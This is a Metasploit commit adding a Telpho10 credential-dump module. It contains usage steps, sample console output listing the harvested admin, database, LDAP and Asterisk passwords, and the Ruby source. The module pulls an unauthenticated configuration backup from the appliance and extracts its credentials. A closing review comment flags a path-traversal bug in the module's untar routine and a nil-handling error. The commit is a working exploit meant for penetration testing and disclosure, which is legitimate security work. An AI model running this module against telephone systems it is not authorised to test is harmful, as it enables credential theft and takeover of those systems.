Land #7484, Add Telpho10 Credentials Dump Exploit
commit
5c12d55c84
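--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE.md
@@ -0,0 +1,132 @@
+## Vulnerable Application
+
+Telpho10 v2.6.31 (32-bit Linux ISO image download [here](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso)).
+
+Supporting documentation for this product can be found [here](http://www.telpho.de/downloads.php).
+
+## Verification Steps
+
+The following steps will allow you to install and dump the credentials from a Telpho10 instance:
+
+1. Download the [Telpho10 ISO image](http://www.telpho.de/downloads/telpho10/telpho10-v2.6.31-SATA.iso) and install in a VM (or on a system)
+- note that the ISO will default to a German keyboard layout
+1. configure the Telpho10's IP address
+- edit /etc/networks/interfaces accordingly
+1. Start msfconsole
+1. Do: ```use auxiliary/admin/http/telpho10_credential_dump```
+1. Do: ```set RHOST <IP address of your Telpho10 instance> ```
+1. Do: ```run```
+1. You should see a list of the retrieved Telpho10 credentials
+
+## Scenarios
+
+Example output when using this against a Telpho10 v2.6.31 VM:
+
+```
+$ ./msfconsole
+
+# cowsay++
+____________
+< metasploit >
+------------
+\ ,__,
+\ (oo)____
+(__) )\
+||--|| *
+
+
+=[ metasploit v4.12.36-dev-16fc6c1 ]
++ -- --=[ 1596 exploits - 908 auxiliary - 273 post ]
++ -- --=[ 458 payloads - 39 encoders - 8 nops ]
++ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
+
+msf > use auxiliary/admin/http/telpho10_credential_dump
+msf auxiliary(telpho10_credential_dump) > set RHOST 10.0.2.35
+RHOST => 10.0.2.35
+msf auxiliary(telpho10_credential_dump) > run
+
+[*] Generating backup
+[*] Downloading backup
+[+] File saved in: /home/pbarry/.msf4/loot/20161028155202_default_10.0.2.35_telpho10.backup_185682.tar
+[*] Dumping credentials
+
+[*] Login (/telpho/login.php)
+[*] -------------------------
+[+] Username: admin
+[+] Password: telpho
+
+[*] MySQL (/phpmyadmin)
+[*] -------------------
+[+] Username: root
+[+] Password: telpho
+
+[*] LDAP (/phpldapadmin)
+[*] --------------------
+[+] Username: cn=admin,dc=localdomain
+[+] Password: telpho
+
+[*] Asterisk MI (port 5038)
+[*] -----------------------
+[+] Username: telpho
+[+] Password: telpho
+
+[*] Mail configuration
+[*] ------------------
+[+] Mailserver:
+[+] Username:
+[+] Password:
+[+] Mail from:
+
+[*] Online Backup
+[*] -------------
+[+] ID:
+[+] Password:
+
+[*] Auxiliary module execution completed
+msf auxiliary(telpho10_credential_dump) >
+```
+
+I navigated my browser to the admin page of the UI and changed some of the password values, then ran the module again to verify I see the updated values:
+
+```
+msf auxiliary(telpho10_credential_dump) > run
+
+[*] Generating backup
+[*] Downloading backup
+[+] File saved in: /home/pbarry/.msf4/loot/20161028161929_default_10.0.2.35_telpho10.backup_044262.tar
+[*] Dumping credentials
+
+[*] Login (/telpho/login.php)
+[*] -------------------------
+[+] Username: admin
+[+] Password: s3cr3t
+
+[*] MySQL (/phpmyadmin)
+[*] -------------------
+[+] Username: root
+[+] Password: telpho
+
+[*] LDAP (/phpldapadmin)
+[*] --------------------
+[+] Username: cn=admin,dc=localdomain
+[+] Password: ldaps3cr3t
+
+[*] Asterisk MI (port 5038)
+[*] -----------------------
+[+] Username: telpho
+[+] Password: asterisks3cr3t
+
+[*] Mail configuration
+[*] ------------------
+[+] Mailserver:
+[+] Username:
+[+] Password:
+[+] Mail from:
+
+[*] Online Backup
+[*] -------------
+[+] ID:
+[+] Password:
+
+[*] Auxiliary module execution completed
+```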
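--- /dev/null
+++ b/PATH-NOT-SHOWN-ON-PAGE.rb
@@ -0,0 +1,159 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+require 'rubygems/package'
+
+class MetasploitModule < Msf::Auxiliary
+include Msf::Auxiliary::Report
+include Msf::Exploit::Remote::HttpClient
+
+def initialize(info={})
+super(update_info(info,
+'Name' => 'Telpho10 Backup Credentials Dumper',
+'Description' => %q{
+This module exploits a vulnerability found in Telpho10 telephone system
+appliance. This module generates a configuration backup of Telpho10,
+downloads the file and dumps the credentials for admin login,
+phpmyadmin, phpldapadmin, etc.
+This module has been successfully tested on the appliance.
+},
+'Author' => 'Jan Rude', # Vulnerability Discovery and Metasploit Module
+'License' => MSF_LICENSE,
+'References' => ['URL', 'https://github.com/whoot/TelpOWN'],
+'Platform' => 'linux',
+'Targets' =>
+[
+['Telpho10 <= 2.6.31', {}]
+],
+'Privileged' => false,
+'DisclosureDate' => 'Sep 2 2016'))
+
+register_options(
+[
+Opt::RPORT(80)
+], self.class)
+end
+
+# Used for unpacking backup files
+def untar(tarfile)
+destination = tarfile.split('.tar').first
+FileUtils.mkdir_p(destination)
+File.open(tarfile, 'rb') do |file|
+Gem::Package::TarReader.new(file) do |tar|
+tar.each do |entry|
+dest = File.join destination, entry.full_name
+if entry.file?
+File.open(dest, 'wb') do |f|
+f.write(entry.read)
+end
+File.chmod(entry.header.mode, dest)
+end
+end
+end
+end
+return destination
+end
+
+# search for credentials in backup file
+def dump_creds(mysql_file)
+file = File.new(mysql_file, 'r')
+while (line = file.gets)
+if line.include? 'adminusername'
+config = [line]
+end
+end
+file.close
+
+print_status('Login (/telpho/login.php)')
+print_status('-------------------------')
+print_good("Username: #{config.first[/adminusername\',\'(.*?)\'/, 1]}")
+print_good("Password: #{config.first[/adminpassword\',\'(.*?)\'/, 1]}\n")
+
+print_status('MySQL (/phpmyadmin)')
+print_status('-------------------')
+print_good('Username: root')
+print_good("Password: #{config.first[/dbpassword\',\'(.*?)\'/, 1]}\n")
+
+print_status('LDAP (/phpldapadmin)')
+print_status('--------------------')
+print_good('Username: cn=admin,dc=localdomain')
+print_good("Password: #{config.first[/ldappassword\',\'(.*?)\'/, 1]}\n")
+
+print_status('Asterisk MI (port 5038)')
+print_status('-----------------------')
+print_good("Username: #{config.first[/manageruser\',\'(.*?)\'/, 1]}")
+print_good("Password: #{config.first[/managersecret\',\'(.*?)\'/, 1]}\n")
+
+print_status('Mail configuration')
+print_status('------------------')
+print_good("Mailserver: #{config.first[/ipsmarthost\',\'(.*?)\'/, 1]}")
+print_good("Username: #{config.first[/mailusername\',\'(.*?)\'/, 1]}")
+print_good("Password: #{config.first[/mailpassword\',\'(.*?)\'/, 1]}")
+print_good("Mail from: #{config.first[/mailfrom\',\'(.*?)\'/, 1]}\n")
+
+print_status('Online Backup')
+print_status('-------------')
+print_good("ID: #{config.first[/ftpbackupid\',\'(.*?)\'/, 1]}")
+print_good("Password: #{config.first[/ftpbackuppw\',\'(.*?)\'/, 1]}\n")
+
+end
+
+def run
+res = send_request_cgi({
+'uri' => '/telpho/system/backup.php',
+'method' => 'GET'
+})
+if res && res.code == 200
+print_status('Generating backup')
+sleep(1)
+else
+print_error("Could not find vulnerable script. Aborting.")
+return nil
+end
+
+print_status('Downloading backup')
+res = send_request_cgi({
+'uri' => '/telpho/temp/telpho10.epb',
+'method' => 'GET'
+})
+if res && res.code == 200
+if res.body.to_s.bytesize == 0
+print_error('0 bytes returned, file does not exist or is empty.')
+return nil
+end
+
+path = store_loot(
+'telpho10.backup',
+'application/x-compressed',
+datastore['RHOST'],
+res.body,
+'backup.tar'
+)
+print_good("File saved in: #{path}")
+
+begin
+extracted = untar("#{path}")
+mysql = untar("#{extracted}/mysql.tar")
+rescue
+print_error('Could not unpack files.')
+return nil
+end
+begin
+print_status("Dumping credentials\n")
+dump_creds("#{mysql}/mysql.epb")
+rescue
+print_error('Could not find credential file.')
+return nil
+end
+else
+print_error('Failed to download backup file.')
+return nil
+end
+rescue ::Rex::ConnectionError
+print_error("#{rhost}:#{rport} - Failed to connect")
+return nil
+end
+end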
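Review bot: `untar` writes every tar entry to `File.join destination, entry.full_name` without checking that the resulting path stays under `destination`, so a backup served by a hostile or tampered appliance could drop files outside the loot directory on the operator's own machine, and `File.chmod(entry.header.mode, dest)` then applies a mode chosen by that archive. A guard before `File.open(dest, 'wb')` such as `raise ArgumentError, "unsafe tar entry: #{entry.full_name}" unless File.expand_path(dest).start_with?(File.expand_path(destination) + File::SEPARATOR)` closes this, and `FileUtils.mkdir_p(File.dirname(dest))` next to it would also stop entries in nested directories from failing the open. In `dump_creds`, `config` is only assigned when a line contains `adminusername`, so a backup without such a line raises NoMethodError on `config.first` and is reported by `run`'s bare `rescue` as 'Could not find credential file.'; an explicit `return print_error('No adminusername entry in backup') unless config` after `file.close` would make that path deliberate and keep the bare `rescue` from masking unrelated errors. The `'References'` value `['URL', 'https://github.com/whoot/TelpOWN']` appears to be missing one level of nesting (`[['URL', ...]]`), since the framework reads this key as a list of reference pairs; worth confirming against neighbouring modules.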